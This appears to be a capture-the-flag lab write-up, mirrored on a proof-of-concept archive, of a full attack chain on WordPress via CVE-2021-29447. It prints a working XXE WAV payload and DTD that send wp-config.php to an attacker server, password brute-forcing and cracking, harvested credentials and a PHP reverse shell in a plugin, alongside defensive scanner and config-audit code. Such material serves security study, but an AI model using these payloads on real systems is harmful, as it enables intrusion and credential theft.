Related vulnerability
Title:
WordPress code issue vulnerability
(CVE-2021-29447)
Description: WordPress is a blogging platform developed in PHP by the WordPress Foundation. It lets users set up a personal blog on a server running PHP and MySQL. WordPress contains a code issue vulnerability; an attacker who carries out a successful XXE attack can use it to read internal files.
Description
The objective is to conduct a full-scale security assessment of a WordPress-based web application, culminating in a complete server compromise. The assessment will focus on exploiting a specific, real-world vulnerability (CVE-2021-29447) to achieve initial access.
Introduction
Project Goal: To demonstrate a complete attack chain on a vulnerable WordPress installation, exploiting CVE-2021-29447 (XXE in media library) to achieve remote code execution and full system compromise.
Phase 1: Reconnaissance & Enumeration
Network Scanning with Nmap:
```bash
# Quick SYN scan to discover open ports
nmap -sS -T4 10.201.3.95
# Detailed version and script scanning
nmap -sV -sC -p22,80,3306 10.201.3.95 -oA initial_scan
```
Results:
```text
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu
80/tcp   open  http    Apache/2.4.18 (Ubuntu)
|_http-generator: WordPress 5.6.2
3306/tcp open  mysql   MySQL 5.7.33
```
WordPress Enumeration with WPScan:
```bash
# User enumeration
wpscan --url http://10.201.3.95/ --enumerate u
# Password brute-force attack
wpscan --url http://10.201.3.95/ --usernames test-corp --passwords passwords.txt
```
Credentials Obtained:
Username: test-corp | Password: test
Username: corp-001 | Password: teddybear (cracked later)
Phase 2: Initial Access - XXE Exploitation (CVE-2021-29447)
Malicious WAV File Creation:
```bash
echo -en 'RIFF\x85\x00\x00\x00WAVEiXML\x79\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.201.27.80:8000/yup.dtd'"'"'>%remote;%param;%send;]>\x00' > payload.wav
```
External DTD Payload (yup.dtd):
```xml
<!ENTITY % payload SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=/var/www/html/wp-config.php">
<!ENTITY % param "<!ENTITY % send SYSTEM 'http://10.201.27.80:8000/?exfil=%payload;'>">
```
HTTP Server for Data Exfiltration:
```bash
python3 -m http.server 8000
```
Data Decoding PHP Script:
```php
<?php
// Base64 blob as captured by the exfiltration server (value omitted here)
$base64 = "...";
// Reverse the php://filter chain: base64-decode, then zlib-inflate
echo zlib_decode(base64_decode($base64));
?>
```
Database Credentials Extracted:
```php
define('DB_NAME', 'wordpressdb2');
define('DB_USER', 'thedarktangent');
define('DB_PASSWORD', 'sUp3rS3cret132');
define('DB_HOST', 'localhost');
```
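From the defender's side, the upload path is the place to catch this class of file. As an added example (not code from the original write-up), the Python scanner below walks the RIFF chunk list of a WAV upload and flags embedded XML metadata that carries a DOCTYPE, an entity with an external SYSTEM/PUBLIC identifier, or a parameter-entity reference, which is exactly what a parser with entity substitution enabled would act on. The set of XML-bearing chunk ids, the sample files and the placeholder host dtd-host.example are constructed here and are not taken from the page; a chunk header that claims more bytes than exist is clamped rather than trusted.

```python
import re
import struct

# Indicators that embedded XML carries a DTD a parser with entity substitution
# enabled would act on: a DOCTYPE, an entity with an external SYSTEM/PUBLIC
# identifier, and a parameter-entity reference (%name;) that pulls in a DTD.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)
ENTITY_RE = re.compile(rb"<!ENTITY\s+(%\s*)?\S+\s+(SYSTEM|PUBLIC)", re.IGNORECASE)
PARAM_REF_RE = re.compile(rb"%[A-Za-z_][\w.-]*;")
XML_CHUNKS = (b"iXML", b"_PMX", b"axml")  # RIFF chunk ids that carry XML metadata (assumed list)


def iter_riff_chunks(data: bytes):
    """Yield (fourcc, payload) for every chunk in a RIFF/WAVE container.

    A chunk length larger than the remaining bytes is clamped, so a crafted
    header cannot make the scanner read past the buffer or loop forever.
    """
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        return
    pos = 12
    while pos + 8 <= len(data):
        fourcc = data[pos:pos + 4]
        (size,) = struct.unpack_from("<I", data, pos + 4)
        start = pos + 8
        yield fourcc, data[start:min(start + size, len(data))]
        pos = start + size + (size & 1)  # chunks are word aligned


def scan_wav_for_xxe(data: bytes) -> dict:
    """Report which XML-bearing chunks an upload contains and whether any of
    them declare a DOCTYPE, an external entity or a parameter-entity reference."""
    findings = {"xml_chunks": [], "doctype": False,
                "external_entity": False, "parameter_entity_ref": False}
    for fourcc, payload in iter_riff_chunks(data):
        if fourcc not in XML_CHUNKS:
            continue
        findings["xml_chunks"].append(fourcc.decode("ascii", "replace"))
        findings["doctype"] |= bool(DOCTYPE_RE.search(payload))
        findings["external_entity"] |= bool(ENTITY_RE.search(payload))
        findings["parameter_entity_ref"] |= bool(PARAM_REF_RE.search(payload))
    findings["suspicious"] = (findings["doctype"] or findings["external_entity"]
                              or findings["parameter_entity_ref"])
    return findings


def build_wav(chunks) -> bytes:
    """Assemble a RIFF/WAVE file from (fourcc, payload) pairs (test helper)."""
    body = b"WAVE"
    for fourcc, payload in chunks:
        body += fourcc + struct.pack("<I", len(payload)) + payload
        if len(payload) & 1:
            body += b"\x00"
    return b"RIFF" + struct.pack("<I", len(body)) + body


# Constructed samples, not files from the original write-up.
FMT = struct.pack("<HHIIHH", 1, 1, 8000, 16000, 2, 16)  # PCM, mono, 8 kHz, 16-bit
BENIGN_WAV = build_wav([(b"fmt ", FMT), (b"data", b"\x00" * 16)])
BENIGN_IXML_WAV = build_wav([(b"fmt ", FMT), (b"iXML",
    b'<?xml version="1.0"?><BWFXML><IXML_VERSION>1.5</IXML_VERSION></BWFXML>')])
HOSTILE_IXML_WAV = build_wav([(b"fmt ", FMT), (b"iXML",
    b'<?xml version="1.0"?><!DOCTYPE x [<!ENTITY % remote SYSTEM '
    b'"http://dtd-host.example/external.dtd">%remote;]><x/>')])
# Header claims a 4 GB chunk but only a few bytes follow.
TRUNCATED_WAV = (b"RIFF" + struct.pack("<I", 100) + b"WAVE"
                 + b"iXML" + struct.pack("<I", 0xFFFFFFF0) + b"<!DOCTYPE")

if __name__ == "__main__":
    for name, blob in [("benign", BENIGN_WAV), ("benign iXML", BENIGN_IXML_WAV),
                       ("hostile iXML", HOSTILE_IXML_WAV), ("truncated", TRUNCATED_WAV)]:
        print(f"{name:13s} -> {scan_wav_for_xxe(blob)}")
```

Running the module prints one findings line per sample; in a real deployment the same function would sit behind the upload handler and reject or quarantine any file where `suspicious` is set, while leaving ordinary iXML metadata (which has no DOCTYPE) untouched.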
Phase 3: Database Access & Credential Harvesting
MySQL Connection:
```bash
mysql -h 10.201.3.95 -u thedarktangent -p
```
SQL Queries Executed:
```sql
SHOW DATABASES;
USE wordpressdb2;
SHOW TABLES;
SELECT user_login, user_pass FROM wptry_users;
```
User Hashes Obtained:
```text
+------------+------------------------------------+
| user_login | user_pass                          |
+------------+------------------------------------+
| corp-001   | $P$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1 |
| test-corp  | $P$Bk3Zzr8rb.5dimh99TRE1krX8X85eR0 |
+------------+------------------------------------+
```
Password Cracking with John the Ripper:
```bash
# Create hash file
cat > wp_hashes.txt << EOF
corp-001:\$P\$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1
test-corp:\$P\$Bk3Zzr8rb.5dimh99TRE1krX8X85eR0
EOF
# Crack hashes
john --wordlist=/usr/share/wordlists/rockyou.txt wp_hashes.txt
john --show wp_hashes.txt
```
Cracked Passwords:
corp-001:teddybear
test-corp:test
Phase 4: Privilege Escalation & RCE
Reverse Shell Payload (Modified Hello Dolly Plugin):
```php
<?php
// PHP Reverse Shell payload
set_time_limit(0);
$VERSION = "1.0";
$ip = '10.201.27.80';
$port = 4444;
$chunk_size = 1400;
$shell = 'uname -a; w; id; /bin/sh -i';
// ... full reverse shell code ...
?>
```
Netcat Listener:
```bash
nc -nvlp 4444
```
Shell Access Obtained:
```text
Connection received on 10.201.3.95 42314
Linux ubuntu 4.4.0-210-generic #242-Ubuntu SMP
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
Phase 5: Post-Exploitation (Pending Completion)
Commands for Next Session:
```bash
# Flag hunting
find / -name flag.txt 2>/dev/null
find / -name root.txt 2>/dev/null
find / -name user.txt 2>/dev/null
# Privilege escalation enumeration
sudo -l
find / -perm -u=s -type f 2>/dev/null
cat /etc/crontab
ps aux
uname -a
cat /etc/os-release
```
Security Findings & Recommendations
Critical Vulnerabilities Identified:
CVE-2021-29447 - XML External Entity processing in WordPress Media Library
Weak Password Policy - Easily guessable passwords (test, teddybear)
Exposed Database Service - MySQL accessible remotely
Outdated Software - WordPress 5.6.2 with known vulnerabilities
Excessive User Privileges - Non-admin users with plugin modification rights
Remediation Recommendations:
Immediate update to latest WordPress version
Implement strong password policy and 2FA
Restrict database access to localhost only
Regular security patching and vulnerability scanning
Principle of least privilege for user accounts
Project Status: 90% Complete - Reverse shell obtained, final flag capture and privilege escalation pending new IP assignment.
PART 2: FLAG
Final Phase: Post-Exploitation & Flag Capture
Objective: Achieve full system compromise and capture the final flag.
Actions Performed:
Reverse Shell Activation:
Edited the hello.php plugin file in the WordPress admin panel (/wp-admin/plugin-editor.php)
Inserted a PHP reverse shell payload configured to connect back to our Kali machine (10.201.6.187:4444)
Executed the payload by accessing: http://ip-10-201-46-113.ec2.internal/wp-content/plugins/hello.php
Successful Shell Access:
Obtained a reverse shell connection as user www-data
Shell output:
```text
Connection received on 10.201.46.113 46240
Linux ubuntu 4.4.0-210-generic #242-Ubuntu SMP
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
File System Exploration:
Discovered user directory: /home/stux/
Found flag directory: /home/stux/flag/
Located the flag file: /home/stux/flag/flag.txt
Flag Extraction:
Command executed: cat /home/stux/flag/flag.txt
Flag captured: thm{28bd2a5b7e0586a6e94ea3e0adbd5f2f16085c}
Complete Attack Chain Summary
| Phase | Technique Used | Result |
|---|---|---|
| 1. Reconnaissance | Nmap scanning | Discovered WordPress 5.6.2 on Apache/2.4.18 |
| 2. Initial Access | WPScan + Password brute-forcing | Gained admin access with test-corp:test |
| 3. Vulnerability Exploitation | CVE-2021-29447 (XXE) | Extracted wp-config.php via malicious WAV file |
| 4. Data Exfiltration | MySQL credential harvesting | Obtained DB credentials: thedarktangent:sUp3rS3cret132 |
| 5. Privilege Escalation | WordPress admin functionality | Edited plugin to gain reverse shell access |
| 6. Final Compromise | System exploration | Captured final flag in /home/stux/flag/flag.txt |
Key Security Findings
Critical Vulnerabilities Exploited:
CVE-2021-29447 - XML External Entity processing in WordPress Media Library
Weak Password Policy - Easily guessable passwords (test, teddybear)
Excessive User Privileges - Non-admin users able to modify plugins
Outdated Software - WordPress 5.6.2 with known vulnerabilities
Information Exposure - Database credentials in wp-config.php
Security Recommendations:
✅ Immediate update to latest WordPress version
✅ Implement strong password policy with 2FA
✅ Regular security patching and vulnerability scanning
✅ Principle of least privilege for user accounts
✅ Restrict file upload functionality and XML processing
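Two of the recommendations listed here and in the Part 1 list are directly checkable from configuration: disabling the in-browser plugin editor that turned admin access into code execution, and keeping MySQL on the loopback interface so leaked DB credentials cannot be used from the network. As an added example (not code from the original write-up), the Python audit below parses wp-config.php for `DISALLOW_FILE_EDIT` / `DISALLOW_FILE_MODS` and the MySQL server section for `bind-address`; the sample configuration texts are constructed here and contain placeholder values, not the assessed server's secrets.

```python
import re

# define('NAME', value);  -- captures the constant name and the raw value text
DEFINE_RE = re.compile(
    r"""define\(\s*['"](?P<name>[A-Z_]+)['"]\s*,\s*(?P<value>[^)]+?)\s*\)\s*;""")
BIND_RE = re.compile(r"bind[-_]address\s*=\s*(\S+)")
LOOPBACK = ("127.0.0.1", "localhost", "::1")


def parse_wp_defines(wp_config: str) -> dict:
    """Collect the define('NAME', value) pairs from wp-config.php source text.
    PHP booleans become Python bools; quoted strings lose their quotes."""
    defines = {}
    for m in DEFINE_RE.finditer(wp_config):
        raw = m.group("value").strip()
        if raw.lower() in ("true", "false"):
            defines[m.group("name")] = raw.lower() == "true"
        else:
            defines[m.group("name")] = raw.strip("'\"")
    return defines


def audit_wp_config(wp_config: str) -> list:
    """Return findings for the WordPress-side weaknesses the assessment used."""
    d = parse_wp_defines(wp_config)
    findings = []
    # Either constant removes the plugin/theme editor from the admin panel.
    if d.get("DISALLOW_FILE_EDIT") is not True and d.get("DISALLOW_FILE_MODS") is not True:
        findings.append("plugin/theme editor enabled: set DISALLOW_FILE_EDIT "
                        "(or DISALLOW_FILE_MODS) to true")
    host = d.get("DB_HOST", "")
    if host and host.split(":")[0] not in LOOPBACK:
        findings.append(f"DB_HOST is {host!r}: database traffic leaves the host")
    return findings


def audit_mysql_config(my_cnf: str) -> list:
    """Flag a MySQL server configuration that listens beyond loopback."""
    bind = None
    for line in my_cnf.splitlines():
        line = line.split("#", 1)[0].strip()  # drop trailing comments
        m = BIND_RE.match(line)
        if m:
            bind = m.group(1)
    if bind is None:
        return ["no bind-address set: the server default listens on all interfaces"]
    if bind not in LOOPBACK:
        return [f"bind-address = {bind}: MySQL reachable from the network"]
    return []


# Constructed samples with placeholder values, not the assessed server's files.
WEAK_WP_CONFIG = """<?php
define('DB_NAME', 'wordpressdb');
define('DB_USER', 'wpuser');
define('DB_PASSWORD', 'example-password');
define('DB_HOST', 'localhost');
"""
HARDENED_WP_CONFIG = WEAK_WP_CONFIG + "define('DISALLOW_FILE_EDIT', true);\n"
WEAK_MY_CNF = "[mysqld]\nbind-address = 0.0.0.0\n"
HARDENED_MY_CNF = "[mysqld]\nbind-address = 127.0.0.1  # loopback only\n"

if __name__ == "__main__":
    for label, fn, text in [("weak wp-config", audit_wp_config, WEAK_WP_CONFIG),
                            ("hardened wp-config", audit_wp_config, HARDENED_WP_CONFIG),
                            ("weak my.cnf", audit_mysql_config, WEAK_MY_CNF),
                            ("hardened my.cnf", audit_mysql_config, HARDENED_MY_CNF)]:
        print(f"{label:19s}: {fn(text) or 'no findings'}")
```

The checks are deliberately textual so they can run against a backup or a configuration-management repository without touching the live host; the same two settings are what closes the step 5 (plugin editor) and step 4 (remote MySQL) links of the chain in the summary table.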
Conclusion
Project Chimera successfully demonstrated a complete attack chain from initial reconnaissance to full system compromise. The exercise highlighted how a seemingly minor XML parsing vulnerability (CVE-2021-29447) could be chained with poor security practices to achieve complete system takeover.
The project emphasized the importance of:
Regular software updates and patch management
Strong authentication mechanisms
Proper access control and privilege management
Comprehensive security monitoring
Final Status: ✅ 100% Complete - All objectives achieved, flag captured: thm{28bd2a5b7e0586a6e94ea3e0adbd5f2f16085c}
Project Chimera serves as a powerful reminder that security requires defense in depth, as a single vulnerability can lead to complete system compromise when combined with other security weaknesses.
File snapshot
[4.0K] /data/pocs/2e9165afb3f6652226358873a63daf0f6b3094f1
├── [278K] 10.jpeg
├── [183K] 11.jpeg
├── [434K] 12.jpeg
├── [144K] 13.jpeg
├── [130K] 14.jpeg
├── [ 78K] 15.jpeg
├── [ 94K] 16.jpeg
├── [108K] 17.jpeg
├── [120K] 18.jpeg
├── [ 99K] 19.jpeg
├── [197K] 1.jpeg
├── [181K] 20.jpeg
├── [304K] 21.jpeg
├── [165K] 22.jpeg
├── [153K] 23.jpeg
├── [122K] 2.jpeg
├── [204K] 3.jpeg
├── [141K] 4.jpeg
├── [101K] 5.jpeg
├── [137K] 6.jpeg
├── [170K] 7.jpeg
├── [154K] 8.jpeg
├── [136K] 9.jpeg
└── [8.1K] README.md
0 directories, 24 files
Notes
1. Accessing the PoC through its original source is recommended.
2. If the source is no longer available or cannot be reached, e-mail f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.